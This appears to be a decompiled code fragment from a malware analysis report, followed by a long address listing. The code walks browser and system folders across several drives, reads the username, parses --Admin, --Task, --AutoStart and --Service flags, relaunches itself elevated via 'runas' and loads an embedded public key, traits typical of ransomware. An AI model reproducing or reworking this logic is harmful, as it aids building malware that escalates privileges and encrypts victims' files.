																	E004205A0(_t960, _t1211, _t817 + _t817);
																	_t1282 = _t1282 + 0xc;
																}
															}
															_t960[4] = _t1211[4];
															_t960[5] = _t1211[5];
															__eflags = 0;
															_t1211[5] = 7;
															_t1211[4] = 0;
															 *_t1211 = 0;
														}
														__eflags = _v28 - 8;
														if(_v28 >= 8) {
															L00422587(_v48);
															_t1282 = _t1282 + 4;
														}
														_push(0xb);
														_v28 = 7;
														_v32 = 0;
														_v48 = 0;
														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
														_t1237 = _t1236 + 0x888;
														E00413580(_t960, _t1236 + 0x888,  &_v56);
														__eflags = _v40 - 8;
														if(_v40 >= 8) {
															L00422587(_v52);
															_t1282 = _t1282 + 4;
														}
														_push(0x27);
														_v32 = 7;
														_v36 = 0;
														_v52 = 0;
														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v60);
														__eflags = _v44 - 8;
														if(_v44 >= 8) {
															L00422587(_v56);
															_t1282 = _t1282 + 4;
														}
														_push(0x29);
														_v36 = 7;
														_v40 = 0;
														_v56 = 0;
														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v64);
														__eflags = _v48 - 8;
														if(_v48 >= 8) {
															L00422587(_v60);
															_t1282 = _t1282 + 4;
														}
														_push(0x1e);
														_v40 = 7;
														_v44 = 0;
														_v60 = 0;
														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
														E00413580(_t960, _t1237,  &_v68);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v64);
															_t1282 = _t1282 + 4;
														}
														_push(0x21);
														_v44 = 7;
														_v48 = 0;
														_v64 = 0;
														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v72);
														__eflags = _v56 - 8;
														if(_v56 >= 8) {
															L00422587(_v68);
															_t1282 = _t1282 + 4;
														}
														_push(0x23);
														_v48 = 7;
														_v52 = 0;
														_v68 = 0;
														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v76);
														__eflags = _v60 - 8;
														if(_v60 >= 8) {
															L00422587(_v72);
															_t1282 = _t1282 + 4;
														}
														_push(0x18);
														_v52 = 7;
														_v56 = 0;
														_v72 = 0;
														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
														E00413580(_t960, _t1237,  &_v80);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v76);
															_t1282 = _t1282 + 4;
														}
														E00413100( &_v76, _t1211, L"D:\\Windows\\");
														_v52 = E00415200( &_v36);
														_t353 = E00415610(_t648) + 0x880; // 0x880
														E00413580(_t960, _t353,  &_v80);
														E00413210( &_v84);
														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
														_t1212 = E00413920( &_v44);
														_t358 = _t1212 + 0x880; // 0x880
														_t961 = _t358;
														E00413580(_t358, _t358,  &_v88);
														E00413210( &_v92);
														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v96);
														E00413210( &_v100);
														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
														E00413580(_t961, _t961,  &_v104);
														E00413210( &_v108);
														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t961, _t961,  &_v112);
														E00413210( &_v116);
														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v120);
														E00413210( &_v124);
														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
														E00413580(_t961, _t961,  &_v128);
														E00413210( &_v132);
														_t375 = _t1212 + 0x868; // 0x868
														_t1238 = _t375;
														_t677 = E00413490(_t375, 0);
														__eflags =  *_t677 - 0x2e;
														if( *_t677 != 0x2e) {
															_t800 = E0041CDD0( &_v76, _t1238);
															_t1282 = _t1282 + 4;
															E004131D0(_t1238, _t800);
															E00413210( &_v80);
														}
														E0041C140(E00413560( &_v76), _t961);
														E00413600( &_v80);
														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
														_t1283 = _t1282 + 4;
														E00412C20( &_a300);
														_t962 = _v92;
														_t1239 = 0;
														do {
															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
															_t1239 = _t1239 + 1;
															__eflags = _t1239 - 0xa;
														} while (_t1239 < 0xa);
														_v8 = 0x100;
														GetUserNameW( &_a388,  &_v8); // executed
														E00413930( &_v76);
														_t1284 = _t1283 - 0x18;
														E00412C40(_t1284, _t1212, "|");
														_t1285 = _t1284 - 0x18;
														E00412BF0(_t1285,  &_a300);
														E0040ECB0( &_v84);
														_t1286 = _t1285 + 0x30;
														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
														__eflags = _t697;
														if(_t697 != 0) {
															do {
																_t782 = E00412F40(E0041C430( &_v88));
																_t1290 = _t1286 - 0x18;
																E00412C40(_t1290, _t1212, _t782);
																_t784 = E00412900( &_v8, 0);
																_t400 = _t1212 + 0x880; // 0x880
																E00413580(_t962, _t400, _t784);
																E00413210( &_v12);
																_t788 = E00413100( &_a96, _t1212,  &_a380);
																_t789 = E00413100( &_v16, _t1212, L"%username%");
																_t405 = _t1212 + 0x880; // 0x880
																_t1239 = _t789;
																_t790 = E00413660(_t405);
																_t406 = _t1212 + 0x880; // 0x880
																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
																_t1286 = _t1290 + 0x1c;
																E00413210( &_v24);
																E00413210( &_a84);
																E0041C440( &_v108);
																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
																__eflags = _t799;
															} while (_t799 != 0);
														}
														_t414 = _t1212 + 0x880; // 0x880
														E004136C0(_t414,  &_a204);
														E0040CA70(_t962,  &_v36, _t1212, _t1239);
														_t416 = _t1212 + 0x850; // 0x850
														E004130B0(_t1286 - 0x18, _t416); // executed
														E0040C740(); // executed
														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg"); // executed
														E0041BA10(_a4);
														_t707 = E0041BA80(_a4);
														__eflags = _t707;
														if(_t707 != 0) {
															 *(_t1212 + 0x8c0) = 0;
															 *_t1212 =  *0x51323c;
															E00413560( &_v4);
															E00410A50( &_v4); // executed
															E0041C140(E00413560( &_v32),  &_v4);
															E00413600( &_v36);
															E00413100( &_v36, _t1212, L"F:\\");
															E00413580(_t962,  &_v12,  &_v40);
															E00413210( &_v44);
															E00413640( &_v16,  &_v100);
															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
															__eflags = _t723;
															if(_t723 != 0) {
																_t966 = _v48;
																do {
																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
																	L214();
																	_t770 = E0041C2F0();
																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
																	_t1239 = _t770;
																	E0041B8B0(_t966, _t1239, _t966); // executed
																	_t773 = E004134B0(E0041C470( &_v100));
																	_t441 = _t1239 + 0x8a4; // 0x8a4
																	E00413260(_t441, _t1212, _t773);
																	 *((char*)(_t1239 + 0x8e0)) = 1;
																	E0041FA10(E0041C3D0(), _t1239); // executed
																	E004138D0( &_v108);
																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
																	__eflags = _t780;
																} while (_t780 != 0);
															}
															 *0x529238 =  *0x51323c; // executed
															E0041FDC0(0x529238); // executed
															_t727 = GetMessageW( &_a272, 0, 0, 0);
															__eflags = _t727;
															if(_t727 != 0) {
																do {
																	TranslateMessage( &_a276);
																	DispatchMessageW( &_a276);
																	_t765 = GetMessageW( &_a276, 0, 0, 0);
																	__eflags = _t765;
																} while (_t765 != 0);
															}
															_t728 =  *0x513250;
															__eflags = _t728;
															if(_t728 != 0) {
																PostThreadMessageW(_t728, 0x12, 0, 0);
																do {
																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t754;
																	if(_t754 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t759;
																		} while (_t759 != 0);
																	}
																	_t755 = WaitForSingleObject( *0x513240, 0xa);
																	__eflags = _t755 - 0x102;
																} while (_t755 == 0x102);
															}
															_t729 =  *0x51324c;
															__eflags = _t729;
															if(_t729 != 0) {
																PostThreadMessageW(_t729, 0x12, 0, 0);
																do {
																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t746;
																	if(_t746 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t751;
																		} while (_t751 != 0);
																	}
																	_t747 = WaitForSingleObject( *0x513248, 0xa);
																	__eflags = _t747 - 0x102;
																} while (_t747 == 0x102);
															}
															__eflags =  *0x513234;
															_t730 =  *0x513230;
															if( *0x513234 == 0) {
																_t730 =  *0x513238;
															}
															__eflags = _t730;
															if(_t730 != 0) {
																CloseHandle(_t730);
															}
															_t1242 = _a284;
															E00413600( &_v4);
														} else {
															_t1242 = 0;
														}
														E004139D0( &_v76);
														E00412D50( &_a304);
														E00412D50( &_a228);
														E00412D50( &_a156);
														E00412D50( &_a180);
													} else {
														_t1242 = 0;
													}
													E00412D50( &_a252);
												} else {
													_t868 = GetVersion();
													__eflags = _t868 - 5;
													if(_t868 <= 5) {
														goto L60;
													} else {
														lstrcpyW( &_a968, L"--Admin");
														lstrcatW( &_a968, L" IsNotAutoStart");
														lstrcatW( &_a968, L" IsNotTask");
														E0042B420( &_a400, 0, 0x38);
														_a396.cbSize = 0x3c;
														_a412 =  &_a3248;
														_t1268 = _t1268 + 0xc;
														_a400 = 0;
														_a416 =  &_a968;
														_t879 = _t1230 + 0x10;
														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
															_t879 =  *_t879;
														}
														_a420 = _t879;
														_a424 = 5;
														_a408 = L"runas";
														_t881 = ShellExecuteExW( &_a396);
														__eflags = _t881;
														if(_t881 == 0) {
															L61:
															_t581 = _a16;
															goto L62;
														} else {
															_t1242 = 0;
														}
													}
												}
											}
										}
									}
									E00413210( &_a204);
									E00413210( &_a132);
									E00412D50( &_a56);
									E00413B10( &_a44);
									return _t1242;
								} else {
									__eflags = 0;
									E00413B10( &_a116);
									return 0;
								}
							} else {
								_t1145 = _a28;
								_v12 = _t1145 + 0x14;
								_t968 = _t1145 + 0xc;
								_a24 = _t1145 + 0x10;
								while(1) {
									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
									_t1264 = _t1264 + 8;
									__eflags = _t895;
									_t896 = _a28;
									if(_t895 != 0) {
										goto L17;
									}
									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
									__eflags = lstrcmpW(L"IsTask",  *_t968);
									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
									 *0x513235 = 1;
									_t1201 = _t1201 + 2;
									_a24 =  &(_a24[2]);
									_t968 =  &(_t968[2]);
									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
									_t923 =  &(_v12[2]);
									L25:
									_a24 =  &(_a24[1]);
									_t1201 = _t1201 + 1;
									_t968 =  &(_t968[1]);
									_v12 =  &(_t923[1]);
									__eflags = _t1201 - _a36;
									if(_t1201 < _a36) {
										_t1145 = _a28;
										continue;
									} else {
										goto L26;
									}
									goto L235;
									L17:
									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
									_t1264 = _t1264 + 8;
									__eflags = _t897;
									_t898 = _a28;
									if(_t897 != 0) {
										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
										_t1264 = _t1264 + 8;
										__eflags = _t899;
										if(_t899 != 0) {
											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
											_t1264 = _t1264 + 8;
											__eflags = _t901;
											if(_t901 != 0) {
												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
												_t1264 = _t1264 + 8;
												__eflags = _t903;
												if(_t903 == 0) {
													_t969 = _a28;
													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
													_a40 = _t1248;
													lstrcpyW("-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ",  *(_t969 + 8 + _t1201 * 4));
													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
													while(1) {
														_t1220 = OpenProcess(0x100000, 0, _t1248);
														__eflags = _t1220;
														if(_t1220 == 0) {
															break;
														}
														_t916 = WaitForSingleObject(_t1220, 0x1f4);
														_t917 = CloseHandle(_t1220);
														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
															break;
														} else {
															_t919 = E00411AB0();
															__eflags = _t919;
															if(_t919 != 0) {
																GlobalFree(_t969);
																__eflags = 0;
																E00413B10( &_a116);
																return 0;
															} else {
																Sleep(1);
																_t1248 = _a40;
																continue;
															}
														}
														goto L235;
													}
													E00411CD0(_t969, 0, 0);
													 *0x529224 = 0;
													_t1249 = GetCurrentProcess();
													_a40 = 0;
													GetExitCodeProcess(_t1249,  &_a40);
													TerminateProcess(_t1249, _a40);
													CloseHandle(_t1249);
													__eflags = 0;
													E00413B10( &_a116);
													return 0;
												} else {
													goto L24;
												}
											} else {
												_a20 = 1;
												goto L24;
											}
										} else {
											_a32 = 1;
											L24:
											_t923 = _v12;
											goto L25;
										}
									} else {
										 *0x513234 = 1;
										lstrcpyW("-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ",  *(_t898 + 4 + _t1201 * 4));
										lstrcpyW(0x521cf0,  *_t968);
										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
										__eflags = lstrcmpW(L"IsTask",  *_v12);
										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
										_a24 =  &(_a24[4]);
										_t1201 = _t1201 + 4;
										_t968 =  &(_t968[4]);
										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
										_t923 =  &(_v12[4]);
										goto L25;
									}
									goto L235;
								}
							}
						}
					}
				} else {
					E004124E0();
					return 0;
				}
				L235:
			}

0x00419f93
0x00419f9b
0x00419fa3
0x00419fa5
0x00419fa6
0x00419fab
0x00419fb2
0x00419fc4
0x00419fd2
0x00419fda
0x00419fe0
0x00419fe2
0x00419fe4
0x00419fe4
0x00419fe6
0x00419ff1
0x00419ff9
0x0041a005
0x0041a00a
0x0041a015
0x0041a017
0x0041a019
0x0041a01c
0x0041b669
0x0041b66e
0x00000000
0x0041a022
0x0041a02a
0x0041a030
0x0041a036
0x0041a038
0x0041a03d
0x0041a048
0x0041a04d
0x0041a058
0x0041a05a
0x0041a05c
0x0041a05f
0x0041b673
0x0041b673
0x0041b678
0x0041b67d
0x0041b67e
0x0041b67f
0x0041b680
0x0041b681
0x0041b683
0x0041b68a
0x0041b692
0x0041b697
0x0041b697
0x0041b69a
0x0041b6a4
0x0041b6ae
0x0041b6b5
0x0041b6bc
0x0041b6c4
0x0041b6c9
0x0041b6c9
0x0041b6ce
0x0041b6d8
0x0041b6e2
0x0041b6e9
0x0041b6ef
0x0041b6f1
0x0041b6fa
0x0041b705
0x0041b70a
0x0041b70d
0x0041b717
0x0041b721
0x0041b721
0x0041b72b
0x0041b731
0x0041b733
0x0041b73c
0x0041b747
0x0041b74c
0x0041b74f
0x0041b759
0x0041b763
0x0041b763
0x0041b76d
0x0041b773
0x0041b775
0x0041b77e
0x0041b789
0x0041b78e
0x0041b791
0x0041b79b
0x0041b7a5
0x0041b7a5
0x0041b7af
0x0041b7b6
0x0041b7be
0x0041b7c3
0x0041b7c3
0x0041b7c8
0x0041b7d2
0x0041b7dc
0x0041b7e3
0x0041b7ea
0x0041b7f2
0x0041b7f7
0x0041b7f7
0x0041b7fc
0x0041b806
0x0041b810
0x0041b817
0x0041b81e
0x0041b826
0x0041b82b
0x0041b82b
0x0041b830
0x0041b83a
0x0041b844
0x0041b84b
0x0041b852
0x0041b85a
0x0041b85f
0x0041b85f
0x0041b864
0x0041b86e
0x0041b878
0x0041b87f
0x0041b883
0x0041b888
0x0041b88d
0x0041b890
0x0041b897
0x0041b899
0x0041b8a0
0x0041b8a5
0x0041a065
0x0041a06d
0x0041a073
0x0041a079
0x0041a07b
0x0041a08f
0x0041a099
0x0041a09d
0x0041a09f
0x0041a0a3
0x0041a0a7
0x0041a0ac
0x0041a0bb
0x0041a0c2
0x0041a0c8
0x0041a0ce
0x0041a0e7
0x0041a0f3
0x0041a0fb
0x0041a100
0x0041a10a
0x0041a10c
0x0041a10e
0x0041a112
0x0041a116
0x0041a11b
0x0041a11b
0x0041a11e
0x0041a120
0x0041a127
0x0041a130
0x0041a13b
0x0041a13b
0x0041a140
0x0041a148
0x0041a151
0x0041a156
0x0041a156
0x0041a159
0x0041a16d
0x0041a173
0x0041a181
0x0041a187
0x0041a18c
0x0041a190
0x0041a33d
0x0041a341
0x0041a347
0x0041a34e
0x0041a461
0x0041a354
0x0041a354
0x0041a359
0x0041a359
0x0041a464
0x0041a48a
0x0041a48f
0x0041a493
0x0041a496
0x0041a4a1
0x0041a4a1
0x0041a4a3
0x0041a4ae
0x0041a4b6
0x0041a4b6
0x0041a4b9
0x0041a4bc
0x0041a4c2
0x0041a4c7
0x0041a4d0
0x0041a4d0
0x0041a4d2
0x0041a4d3
0x0041a4d3
0x0041a4d7
0x0041a4d7
0x0041a4be
0x0041a4be
0x0041a4be
0x0041a4db
0x0041a4e4
0x0041a4e9
0x0041a4ea
0x0041a4ea
0x0041a4ef
0x0041a4fe
0x0041a506
0x0041a50c
0x0041a51b
0x0041a529
0x0041a531
0x0041a538
0x0041a547
0x0041a553
0x0041a55e
0x0041a563
0x0041a567
0x0041a56a
0x0041a56e
0x0041a570
0x0041a6ea
0x0041a6ea
0x0041a576
0x0041a576
0x0041a578
0x00000000
0x0041a57e
0x0041a580
0x0041a588
0x0041a58b
0x0041a59b
0x0041a5a4
0x0041a5af
0x0041a5b2
0x0041a5b6
0x0041a5b8
0x0041a5bf
0x0041a5c7
0x0041a5cf
0x0041a5d6
0x0041a5db
0x0041a5de
0x0041a5e3
0x0041a5e9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5f1
0x0041a578
0x0041a5f5
0x0041a602
0x0041a6f9
0x0041a6f9
0x00000000
0x0041a608
0x0041a608
0x0041a60a
0x0041a702
0x0041a702
0x0041a709
0x00000000
0x0041a70f
0x0041a70f
0x0041a711
0x0041a717
0x0041a719
0x0041a72a
0x0041a72f
0x0041a733
0x0041a736
0x0041a741
0x0041a741
0x0041a743
0x0041a74e
0x0041a752
0x0041a752
0x0041a755
0x0041a758
0x0041a75e
0x0041a760
0x0041a763
0x0041a763
0x0041a765
0x0041a766
0x0041a766
0x0041a76a
0x0041a76a
0x0041a75a
0x0041a75a
0x0041a75a
0x0041a76c
0x0041a775
0x0041a77a
0x0041a77b
0x0041a77b
0x0041a784
0x0041a788
0x0041a78e
0x0041a790
0x0041a792
0x0041a797
0x0041a797
0x0041a7bb
0x0041a7c1
0x0041a7c9
0x0041a7ce
0x0041a7d4
0x0041a7d9
0x0041a7d9
0x0041a7ce
0x0041a719
0x0041a7e7
0x0041a7ec
0x0041a7ef
0x0041a7ef
0x0041a7f1
0x0041a7f1
0x0041a7f9
0x0041a803
0x0041a813
0x0041a819
0x0041a81e
0x0041a82f
0x0041a83b
0x0041a841
0x0041a842
0x0041a842
0x0041a852
0x0041a854
0x0041a85b
0x0041a87a
0x0041a886
0x0041a88c
0x0041a895
0x0041a89a
0x0041a89a
0x0041a8a9
0x0041a8af
0x0041a8af
0x00000000
0x0041a610
0x0041a610
0x0041a612
0x00000000
0x0041a618
0x0041a618
0x0041a61e
0x0041a8b6
0x0041a8c5
0x0041a8ca
0x0041a8d5
0x0041a8da
0x0041a8de
0x0041a8e1
0x0041a8ec
0x0041a8ec
0x0041a8ee
0x0041a8f9
0x0041a901
0x0041a901
0x0041a904
0x0041a907
0x0041a90d
0x0041a90f
0x0041a912
0x0041a912
0x0041a914
0x0041a915
0x0041a915
0x0041a919
0x0041a919
0x0041a909
0x0041a909
0x0041a909
0x0041a91b
0x0041a924
0x0041a929
0x0041a92a
0x0041a92a
0x0041a92f
0x0041a932
0x0041a93a
0x0041a93c
0x0041a944
0x0041a94b
0x0041a952
0x0041a955
0x0041a95c
0x0041a962
0x0041a967
0x0041a970
0x0041a970
0x0041a973
0x0041a976
0x0041a976
0x0041a97b
0x0041a97b
0x0041a97d
0x0041a95e
0x0041a95e
0x0041a95e
0x0041a97f
0x0041a987
0x0041a992
0x0041a997
0x0041a99a
0x0041a99e
0x0041a9a0
0x0041a9a0
0x0041a9a6
0x0041a9ab
0x0041a9b0
0x0041a9b4
0x0041a9ba
0x0041a9bf
0x0041a9bf
0x0041a9c6
0x0041a9cc
0x0041a9cf
0x0041a9d8
0x0041a9dd
0x0041a9df
0x0041a9e1
0x0041a9e8
0x0041a9ef
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0a
0x0041aa0d
0x0041aa0d
0x0041aa12
0x0041aa12
0x0041aa14
0x0041a9fb
0x0041a9fb
0x0041a9fb
0x0041aa16
0x0041aa1e
0x0041aa29
0x0041aa2e
0x0041aa31
0x0041aa35
0x0041aa37
0x0041aa37
0x0041aa3e
0x0041aa44
0x0041aa49
0x0041aa4f
0x0041aa54
0x0041aa54
0x0041aa57
0x0041aa5f
0x0041aa65
0x0041aa6a
0x0041aa6a
0x0041aa70
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa76
0x0041aa7b
0x0041aa7b
0x0041aa7d
0x0041aa61
0x0041aa61
0x0041aa61
0x0041aa7f
0x0041aa8b
0x0041aa9b
0x0041aaa0
0x0041aaa4
0x0041aaa7
0x0041aab2
0x0041aab2
0x0041aab4
0x0041aabf
0x0041aac7
0x0041aac7
0x0041aaca
0x0041aacd
0x0041aad3
0x0041aad5
0x0041aad8
0x0041aad8
0x0041aada
0x0041aadb
0x0041aadb
0x0041aadf
0x0041aadf
0x0041aacf
0x0041aacf
0x0041aacf
0x0041aae1
0x0041aaea
0x0041aaef
0x0041aaf0
0x0041aaf0
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab07
0x0041ab0e
0x0041ab16
0x0041ab18
0x0041ab2c
0x0041ab2e
0x0041ab34
0x0041ab37
0x0041ab39
0x0041ab3b
0x0041ab3f
0x0041ab43
0x0041ab48
0x0041ab48
0x0041ab4d
0x0041ab54
0x0041ab5b
0x0041ab5e
0x0041ab62
0x0041ab7b
0x0041ab7d
0x0041ab64
0x0041ab67
0x0041ab67
0x0041ab68
0x0041ab6f
0x0041ab74
0x0041ab74
0x0041ab68
0x0041ab86
0x0041ab8c
0x0041ab8f
0x0041ab91
0x0041ab98
0x0041ab9f
0x0041ab9f
0x0041aba2
0x0041aba7
0x0041abad
0x0041abb2
0x0041abb2
0x0041abc0
0x0041abc5
0x0041abc9
0x0041abcc
0x0041abd7
0x0041abd7
0x0041abd9
0x0041abe4
0x0041abf0
0x0041abf0
0x0041abf3
0x0041abf6
0x0041abfc
0x0041abfe
0x0041ac01
0x0041ac01
0x0041ac03
0x0041ac04
0x0041ac04
0x0041ac08
0x0041ac08
0x0041abf8
0x0041abf8
0x0041abf8
0x0041ac0a
0x0041ac13
0x0041ac18
0x0041ac19
0x0041ac19
0x0041ac1e
0x0041ac28
0x0041ac2c
0x0041ac30
0x0041ac37
0x0041ac3f
0x0041ac41
0x0041ac55
0x0041ac57
0x0041ac5d
0x0041ac60
0x0041ac62
0x0041ac64
0x0041ac68
0x0041ac6c
0x0041ac71
0x0041ac71
0x0041ac76
0x0041ac7d
0x0041ac84
0x0041ac87
0x0041ac8b
0x0041aca4
0x0041aca6
0x0041ac8d
0x0041ac90
0x0041ac90
0x0041ac91
0x0041ac98
0x0041ac9d
0x0041ac9d
0x0041ac91
0x0041acaf
0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
